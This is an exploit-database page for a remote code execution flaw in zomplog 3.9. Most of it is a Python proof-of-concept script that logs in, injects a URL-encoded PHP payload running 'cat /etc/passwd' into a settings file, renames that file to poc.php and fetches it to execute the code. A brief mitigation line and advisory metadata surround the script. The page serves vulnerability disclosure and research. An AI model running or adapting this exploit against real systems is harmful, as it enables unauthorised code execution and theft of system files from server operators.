header-logo
Suggest Exploit
vendor:
zomplog
by:
Mirabbas Agalarov
7.5
CVSS
HIGH
RCE
78
CWE
Product Name: zomplog
Affected Version From: 3.9
Affected Version To: 3.9
Patch Exists: NO
Related CWE:
CPE: zomplog
Metasploit:
Other Scripts:
Platforms Tested: Linux
2023

zomplog 3.9 – Remote Code Execution (RCE)

This exploit allows an attacker to execute arbitrary code remotely in zomplog version 3.9. By manipulating the 'html' parameter, the attacker can inject PHP code to read the '/etc/passwd' file. This allows unauthorized access to sensitive system information.

Mitigation:

Update to a patched version of zomplog to prevent remote code execution attacks.
Source

Exploit-DB raw data:

#Exploit Title: zomplog 3.9 - Remote Code Execution (RCE)
#Application: zomplog 
#Version: v3.9
#Bugs:  RCE
#Technology: PHP
#Vendor URL: http://zomp.nl/zomplog/
#Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
#Date of found: 22.07.2023
#Author: Mirabbas Ağalarov
#Tested on: Linux 


import requests

#inputs
username=input('username: ')
password=input('password: ')

#urls
login_url="http://localhost/zimplitcms/zimplit.php?action=login"
payload_url="http://localhost/zimplitcms/zimplit.php?action=saveE&file=Zsettings.js"
rename_url="http://localhost/zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php"
poc_url="http://localhost/zimplitcms/poc.php"


#login 
session = requests.Session()
login_data=f"lang=en&username={username}&password={password}&submit=Start!"
headers={
    'Cookie' : 'ZsessionLang=en',
    'Content-Type' : 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
    }
login_req=session.post(login_url,headers=headers,data=login_data)

if login_req.status_code == 200:
    print('Login OK')
else:
    print('Login promlem.')
    exit()
#payload
payload_data="html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520"
pheaders={
    'Content-Type' : 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
    }
payload_req=session.post(payload_url,headers=pheaders,data=payload_data)

#rename

rename_req=session.get(rename_url)

#poc
poc_req=session.get(poc_url)
print(poc_req.text)


#youtube poc video - https://youtu.be/nn7hieGyCFs

Navigation

Suggest Exploit

Services By CQR